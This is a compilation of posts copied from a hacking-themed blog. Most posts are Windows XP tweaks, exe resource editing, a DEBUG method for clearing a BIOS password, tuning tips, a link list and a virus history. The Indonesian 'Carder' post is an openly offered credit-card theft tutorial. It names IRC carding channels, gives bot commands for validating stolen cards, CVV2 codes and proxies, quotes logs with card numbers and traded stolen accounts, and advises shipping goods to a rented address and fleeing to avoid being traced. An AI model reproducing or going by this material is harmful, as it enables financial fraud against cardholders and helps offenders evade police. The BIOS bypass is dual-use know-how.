  4047. As laptop users and other LCD owners are quickly realizing, Microsoft's ClearType technology in Windows XP really makes a big difference for readability. But the this feature is enabled on a per-user basis in Windows XP, so you can't see the effect on the Welcome screen; it only appears after you logon.
  4048.  
  4049. But you can fix that. Fire up the Registry Editor and look for the following keys:
  4050.  
  4051. (default user) HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothing (String Value)
  4052. HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothingType (Hexadecimal DWORD Value)
  4053.  
  4054. Make sure both of these values are set to 2 and you'll have ClearType enabled on the Welcome screen and on each new user by default.
  4055.  
  4056.  
  4057.  
  4058. Stop Windows Messenger from Auto-Starting
  4059. =========================================
  4060.  
  4061. If you're not a big fan of Windows Messenger simply delete the following Registry Key:
  4062.  
  4063. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS
  4064.  
  4065.  
  4066. Display Hibernate Option on the Shut Down dialog
  4067. ================================================
  4068.  
  4069. For some reason, Hibernate may not be available from the default Shut Down dialog. But you can enable it simply enough, by holding down the SHIFT key while the dialog is visible. Now you see it, now you don't!
  4070.  
  4071.  
  4072. Add album art to any music folder
  4073. =================================
  4074.  
  4075. One of the coolest new features in Windows XP is its album thumbnail generator, which automatically places the appropriate album cover art on the folder to which you are copying music (generally in WMA format). But what about those people that have already copied their CDs to the hard drive using MP3 format? You can download album cover art from sites such as cdnow.com or amguide.com, and then use the new Windows XP folder customize feature to display the proper image for each folder. But this takes time--you have to manually edit the folder properties for every single folder--and you will lose customizations if you have to reinstall the OS. There's an excellent fix, however.
  4076.  
  4077. When you download the album cover art from the Web, just save the images as folder.jpg each time and place them in the appropriate folder. Then, Windows XP will automatically use that image as the thumbnail for that folder and, best of all, will use that image in Windows Media Player for Windows XP (MPXP) if you choose to display album cover art instead of a visualization. And the folder customization is automatic, so it survives an OS reinstallation as well. Your music folders never looked so good!
  4078.  
  4079.  
  4080. Album cover art makes music folder thumbnails look better than ever!
  4081.  
  4082.  
  4083. Change the location of the My Music or My Pictures folders
  4084. ==========================================================
  4085.  
  4086. In Windows 2000, Microsoft added the ability to right-click the My Documents folder and choose a new location for that folder in the sh*ll
  4087. . With Windows XP, Microsoft has elevated the My Music and My Pictures folders to the same "special sh*ll
  4088. folder" status of My Documents, but they never added a similar (and simple) method for changing those folder's locations. However, it is actually pretty easy to change the location of these folders, using the following method.
  4089.  
  4090. Open a My Computer window and navigate to the location where you'd like My Music (or My Pictures) to reside. Then, open the My Documents folder in a different window. Drag the My Music (or My Pictures) folder to the other window, and Windows XP will update all of the references to that folder to the new location, including the Start menu.
  4091.  
  4092. Or use Tweak UI
  4093.  
  4094.  
  4095. Add/Remove optional features of Windows XP
  4096. ==========================================
  4097.  
  4098. To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open the sysoc.inf file. Under Windows XP Professional Edition RC1, this file will resemble the following by default:
  4099.  
  4100. [Version] Signature = "$Windows NT$"
  4101. DriverVer=06/26/2001,5.1.2505.0
  4102.  
  4103. [Components]
  4104. NtComponents=ntoc.dll,NtOcSetupProc,,4
  4105. WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
  4106. Display=desk.cpl,DisplayOcSetupProc,,7
  4107. Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
  4108. NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
  4109. iis=iis.dll,OcEntry,iis.inf,,7
  4110. com=comsetup.dll,OcEntry,comnt5.inf,hide,7
  4111. dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
  4112. IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
  4113. TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
  4114. msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
  4115. ims=imsinsnt.dll,OcEntry,ims.inf,,7
  4116. fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
  4117. AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
  4118. msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
  4119. msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7
  4120. smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7
  4121. RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
  4122. Games=ocgen.dll,OcEntry,games.inf,,7
  4123. AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
  4124. CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
  4125. MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
  4126. AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
  4127. Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
  4128. MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
  4129. ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7
  4130.  
  4131. [Global]
  4132. WindowTitle=%WindowTitle%
  4133. WindowTitle.StandAlone="*"
  4134.  
  4135. The entries that include the text hide or HIDE will not show up in Add/Remove Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, relaunch Add/Remove Windows Components, and tweak the installed applications to your heart's content.
  4136.  
  4137.  
  4138. Cool, eh? There are even more new options now under "Accessories and Utilities" too.
  4139.  
  4140.  
  4141. Remove Windows Messenger
  4142. ========================
  4143.  
  4144. It seems that a lot of people are interested in removing Windows Messenger for some reason, though I strongly recommend against this: In Windows XP, Windows Messenger will be the hub of your connection to the .NET world, and now that this feature is part of Windows, I think we're going to see a lot of .NET Passport-enabled Web sites appearing as well. But if you can't stand the little app, there are a couple of ways to get rid of it, and ensure that it doesn't pop up every time you boot into XP. The best way simply utilizes the previous tip:
  4145.  
  4146. If you'd like Windows Messenger to show up in the list of programs you can add and remove from Windows, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open sysoc.inf (see the previous tip for more information about this file). You'll see a line that reads:
  4147.  
  4148. msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
  4149.  
  4150. Change this to the following and Windows Messenger will appear in Add or Remove Programs, then Add/Remove Windows Components, then , and you can remove it for good:
  4151.  
  4152. msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
  4153.  
  4154. Have a nice day!!!
  4155. original from : http://www.the-cybers-skills.blogspot.com
  4156. How to modify *.exe files
  4157. Saturday, September 17, 2011 2:31 AM
  4158. learn how to change *.exe files, in 5 easy steps:
  4159.  
  4160. 1) Don't try to modify a prog by editing his source in a dissasembler.Why?
  4161. Cause that's for programmers and assembly experts only.
  4162.  
  4163. try to view it in hex you'll only get tons of crap you don't understand.
  4164. First off, you need Resource Hacker(last version). It's a resource editor-
  4165. very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/
  4166.  
  4167. 2) Unzip the archive, and run ResHacker.exe. You can check out the help file too
  4168.  
  4169.  
  4170. 3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.
  4171.  
  4172. 4) In the left side of the screen a list of sections will appear.
  4173. The most common sections are
  4174. -String table;
  4175. -RCData;
  4176. -Dialog;
  4177. -Cursor group;
  4178. -Bitmap;
  4179. -WAV.
  4180. *Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
  4181. *String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
  4182. *RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
  4183. *Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
  4184. *Cursor group: Change the mouse cursors used in the program just like you would change the icon.
  4185. *Bitmap: View or change images in the programs easy!
  4186. *WAV:Change the sounds in the prog. with your own.
  4187.  
  4188.  
  4189. 5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.
  4190.  
  4191.  
  4192. TIP: To change a window title, search for something like: CAPTION "edit this".
  4193. TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
  4194. TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
  4195. TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.
  4196. original from : http://www.the-cybers-skills.blogspot.com
  4197. Reset lost BIOS password
  4198. Saturday, December 04, 2010 7:19 PM
  4199. Here's a DOS trick for Windows 9x, that will reset (delete) your motherboard's BIOS password (aka CMOS password) without any need to open up your computer to remove the battery or mess with jumpers.
  4200.  
  4201. This method can come in very handy in the event you ever lose and forget your BIOS password or if you acquire used computers where the unknown previous owners had BIOS passwords set (in fact, this happened to me long ago—I was given a used computer, but there was no way I could enter the CMOS to make changes). It's important to note here that the password we are talking about is only the one that prevents a user from entering the BIOS setup at bootup, not the one that stops you from getting past the boot.
  4202.  
  4203. Normally, at bootup you can press a key (usually the DEL key) to access your BIOS allowing you to view it or make changes. With a password set, there is no way to enter setup. Though a password can provide a basic and very effective level of PC security, losing it can be a real headache if you don't know how to fix the problem.
  4204.  
  4205. The MS-DOS command that will makes this trick possible is the DEBUG command (debug itself is a utility—debug.exe—which is located in your Windows Command folder). This is not a command to be taken lightly—in other words, it's not a command to play with! You can cause serious corruption with this command and can end up not being able to even boot your computer! Debug is used to work with binary and executable files and allows you to alter (hex edit) the contents of a file or CPU register right down to the binary and byte level.
  4206.  
  4207. To begin debug mode, type debug at a MS-DOS prompt or you can specify a file, i.e., DEBUG FILE.EXE. There is a difference in screen output between the two methods. When you type DEBUG alone, debug responds with a hyphen (-) prompt waiting for you to enter commands. The second method, with a file specified, loads the file into memory and you type all the commands on the line used to start debug. In this tip, we will be writing to the BIOS, so the first method is the one that would be used. All debug commands can be aborted at any time by pressing CTRL/C.
  4208.  
  4209. Accessing BIOS with DEBUG
  4210. The basic trick will be to fool the BIOS into thinking there is a checksum error, in which case it resets itself, including the password. This is done by invalidating the CMOS and to do that we must know how to access the BIOS and where the checksum value of the CMOS is located so that we can change it. Access to the the BIOS content is via what are known as CMOS Ports and it's Port 70 and 71 that will give us the needed access. On almost all AT motherboards, the checksum is located at hexadecimal address 2e and 2f and filling the address 2e with ff is all you should have to do to invalidate the checksum.
  4211.  
  4212. Here's what to do if you ever need to reset the password and have no other method, and you don't want to open up your computer to remove the battery or jumpers.
  4213.  
  4214. Note! Do this at your own risk. I can only tell you that it has worked for me more than once and has worked for others as well. But I cannot make any guarantees. When I did this, I took a willing risk. The BIOS was Award Modular BIOS v4.51PG
  4215.  
  4216. Restart your computer in MS-DOS mode.
  4217.  
  4218.  
  4219. When you get to the C:\> or C:\WINDOWS> prompt, type DEBUG and press Enter.
  4220.  
  4221.  
  4222. A hyphen (-) prompt will appear waiting for you to enter commands.
  4223.  
  4224.  
  4225. Enter the following commands, pressing Enter after each one. Note: the o is the letter o and stands for OUTPUT.
  4226.  
  4227.  
  4228. o 70 2e
  4229.  
  4230.  
  4231. o 71 ff
  4232.  
  4233.  
  4234. q
  4235.  
  4236.  
  4237. After the q command (which stands for QUIT), enter Exit.
  4238.  
  4239.  
  4240. Then try to enter your BIOS at bootup. The password prompt should now be gone and you should now have full access to it again. However, you will now be at the default BIOS setttings and may want to change them to your preference. You may also want to have your drives autodetected again.
  4241. In closing, I should state that in the case of a lost BIOS password, your first step should always be to contact your manufacturer to see if a backdoor password is available that will allow you to bypass the forgotten password.
  4242.  
  4243. There are many sites on the net that list backdoor passwords you can try, but beware that some BIOS that are set up to lock up if you enter the wrong password more than a certain number of times, usually only 3 times!
  4244. original from : http://www.the-cybers-skills.blogspot.com
  4245. Remote Shutdown, to shutdown another computer with remote
  4246. Saturday, September 17, 2011 2:31 AM
  4247. XP PRO has a lot of fun utilities. One of the most useful ones I have found to date is the ability to remotely reboot a PC. There are 2 ways of doing this. You will need to have admin access to the PC to preform these actions. That being said, here is the first way to do it:
  4248.  
  4249. Right click my computer, choose manage.
  4250. Highlight the Computer Management (Local) then click on Action, choose connect to another computer.
  4251.  
  4252. In the window that opens fill in the machine name of the PC you want to connect to and click ok.
  4253. Once connected right click on Computer Management (Remote machine name) and choose properties.
  4254.  
  4255. Go to the "Advanced" tab and click the Settings button under Start up and recovery.
  4256. Click on the Shutdown button.
  4257.  
  4258. Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).
  4259.  
  4260. The second way... Remember dos... that good old thing. Open up a command prompt and enter in the following:
  4261.  
  4262. %windir%\System32\shutdown.exe -r -m \\Machinename. The command prompt has more switches and options. I highly suggest using shutdown.exe /? to see all the posibilities.
  4263. original from : http://www.the-cybers-skills.blogspot.com
  4264. 23 Ways To Speed Windows XP,not only defrag
  4265. Saturday, September 17, 2011 2:31 AM
  4266. Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
  4267. 1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.
  4268.  
  4269. 2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.
  4270.  
  4271. 3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.
  4272.  
  4273. 4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.
  4274.  
  4275. The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.
  4276.  
  4277. Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.
  4278.  
  4279. Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.
  4280.  
  4281. 5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.
  4282.  
  4283. 6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.
  4284.  
  4285. 7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.
  4286.  
  4287. 8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.
  4288.  
  4289. 9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.
  4290.  
  4291. 10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.
  4292.  
  4293. 11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.
  4294.  
  4295. 12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.
  4296.  
  4297. 13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.
  4298.  
  4299. 14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.
  4300.  
  4301. 15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.
  4302.  
  4303. 16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.
  4304.  
  4305. 17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.
  4306.  
  4307. 18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.
  4308.  
  4309. 19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.
  4310.  
  4311. 20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.
  4312.  
  4313. 21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.
  4314.  
  4315. 22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.
  4316.  
  4317. 23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.
  4318.  
  4319.  
  4320. Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.
  4321. original from : http://www.the-cybers-skills.blogspot.com
  4322. Carder
  4323. Saturday, December 04, 2010 7:18 PM
  4324. Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.
  4325.  
  4326. Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.
  4327.  
  4328. Mari kita mulai......
  4329.  
  4330. 1.masuk ke MIRC
  4331. dari MIRC kalian join ke channel ini :
  4332.  
  4333. #CCPOSTS
  4334. #THACC (Dulu namanya #thecc)
  4335.  
  4336. sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!
  4337.  
  4338. 2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.
  4339.  
  4340. 3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.
  4341.  
  4342. 4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)
  4343.  
  4344. 5.!proxy
  4345. untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.
  4346.  
  4347. 6.!order.log
  4348. untuk mengetahui nama,alamat dan cc number seseorang.
  4349.  
  4350. ini nih cuplikannya :
  4351.  
  4352. #ccposts
  4353.  
  4354. *** Now talking in #ccposts
  4355.  
  4356. *** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'
  4357.  
  4358. *** Set by ^XDIrc^ on Thu May 09 02:04:28
  4359. -CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands
  4360.  
  4361. *** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , <> is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc -listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?
  4362.  
  4363. *** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)
  4364.  
  4365. *** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )
  4366.  
  4367. * DaLinuX i have root i need cc msg me for trade
  4368. !chk 373216942923005 0802
  4369.  
  4370.  
  4371. #thacc
  4372. *** Now talking in #thacc
  4373. *** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD' *** Set by GSD on Fri May 03 02:11:11 !proxy *** Parts: fc4 (~umik_o@203.147.50.12) *** Joins: fc4 (~umik_o@203.147.50.12) <^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?
  4374. *** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
  4375. *** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
  4376. *** e_KiNGHT-[Away] is now known as Guest53360
  4377. How I can see my card is valid
  4378. * DaLinuX i have root i need cc msg me for trade
  4379.  
  4380.  
  4381. Jelas ??!
  4382. Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak
  4383. original from : http://www.the-cybers-skills.blogspot.com
  4384. Daftar situs-situs hacking
  4385. Thursday, April 28, 2011 2:57 PM
  4386. - Indonesia------------------------------------------
  4387.  
  4388. The cybers skills http://www.cyberskills.co.cc
  4389.  
  4390. Jambihacker http://www.jambihackerlink.tk/
  4391.  
  4392. Jasakom http://www.jasakom.com/
  4393.  
  4394. balihacker http://www.balihackerlink/
  4395.  
  4396. bali http://balihacker.hp.ms/
  4397.  
  4398. solo http://solohackerlink.web.id/
  4399.  
  4400. Echo http://www.echo.or.id/
  4401.  
  4402. Yogya http://www.yogyafree.net/
  4403.  
  4404. bali http://balihack.or.id/
  4405.  
  4406. malang http://malanghack.net/
  4407.  
  4408. Spyro http://www.spyrozone.tk/
  4409.  
  4410. Kecoak http://www.kecoak-elektronik.net/
  4411.  
  4412. Infosekuriti http://www.infosekuriti.com/
  4413.  
  4414. - Luar Negeri------------------------------------------
  4415.  
  4416. PacketStorm http://www.packetstormsecurity.org/
  4417.  
  4418. Phrack Magz http://www.phrack.org/
  4419.  
  4420. Securiteam http://www.securiteam.com/
  4421.  
  4422. SecurityFocus http://www.securityfocus.com/
  4423.  
  4424. SecurityReason http://www.securityreason.com/
  4425.  
  4426. HackThis Site http://www.hackthissite.com/
  4427.  
  4428. http://www.echo.or.id/
  4429.  
  4430. http://winxpinfo.com/
  4431.  
  4432. http://www.outerlimits.net/lordsome/index.html (Hacker's Layer)
  4433.  
  4434. http://web2.airmail.net/km/hfiles/free.htm     (Hacker's Hideout)
  4435.  
  4436. http://resudox.net/bio/novell.html
  4437.  
  4438. http://www.louisville.edu/wrbake01/hack2.html
  4439.  
  4440. http://www.intersurf.com/~materva/files.html
  4441.  
  4442. http://hightop.nrl.navy.mil/rainbow.html
  4443.  
  4444. http://www.rit.edu/~jmb8902/hacking.html
  4445.  
  4446. http://www.spatz.com/pecos/index.html
  4447.  
  4448. http://pages.prodigy.com/FL/dtgz94a/files2.html
  4449.  
  4450. http://www.2600.com
  4451.  
  4452. http://att.net/dir800
  4453.  
  4454. http://draco.centerline.com:8080/~franl/crypto.html
  4455.  
  4456. http://everest.cs.ucdavis.edu/Security.html
  4457.  
  4458. http://ice-www.larc.nasa.gov/WWW/security.html
  4459.  
  4460. http://lOpht.com
  4461.  
  4462. http://lOpht.com/~oblivion/IIRG.html
  4463.  
  4464. http://underground.org
  4465.  
  4466. http://www.alw.nih.gov/WWW/security.html
  4467.  
  4468.  
  4469. http://www.aspentec.com/~frzmtdb/fun/hacker.html
  4470.  
  4471. http://www.cis.ohi-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
  4472.  
  4473. http://www.cs.tufts.ed/~mcable/cypher/alerts/alerts.html
  4474.  
  4475.  
  4476. http://www.engin.umich.edu/~jgotts/underground/boxes.html
  4477.  
  4478. http://www.etext.org/Zines
  4479.  
  4480. http://www.inderect.com/www/johnk/
  4481.  
  4482. http://www.mgmua.com/hackers/index.html
  4483.  
  4484. http://www.paranoia.com/mthreat
  4485.  
  4486. http://www.paranoia.com/astrostar/fringe.html
  4487.  
  4488. http://www.umcc.umich.edu/~doug/virus-faq.html
  4489.  
  4490. http://www.wired.com
  4491.  
  4492. -Tool Hacking------------------------------------------
  4493.  
  4494. http://www.hackingexposed.com/
  4495.  
  4496. http://www.atstake.com/
  4497.  
  4498.  
  4499. http://www.hoobie.net/
  4500.  
  4501.  
  4502. http://www.k-elektronik.org/
  4503.  
  4504.  
  4505. http://www.hackerlink.or.id/
  4506.  
  4507. http://packetstorm.securify.com/
  4508.  
  4509. http://neworder.box.sk/
  4510.  
  4511. http://www.rootshell.com/
  4512.  
  4513. http://xforce.iis.net/
  4514.  
  4515. http://www.nmap.org/
  4516.  
  4517. http://www.insecure.org/
  4518.  
  4519. http://winpcap.polito.it/
  4520.  
  4521. http://www.echo.or.id/
  4522.  
  4523. http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html
  4524.  
  4525. http://www.jasakom.com/
  4526.  
  4527. http://www.kangtatantakwa.com/
  4528. original from : http://www.the-cybers-skills.blogspot.com
  4529. Pengertian Dasar Virus
  4530. Saturday, April 23, 2011 10:58 PM
  4531. Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti danmemahami tentang virus.
  4532.  
  4533. A.ASAL MUASAL VIRUS
  4534.  
  4535. 1949, John Von Neuman, menggungkapkan   " teori self altering automata " yang merupakan hasil riset dari para ahli matematika.
  4536. 1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.Program yang mampu bertahan dan menghancurkan semua program lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat.
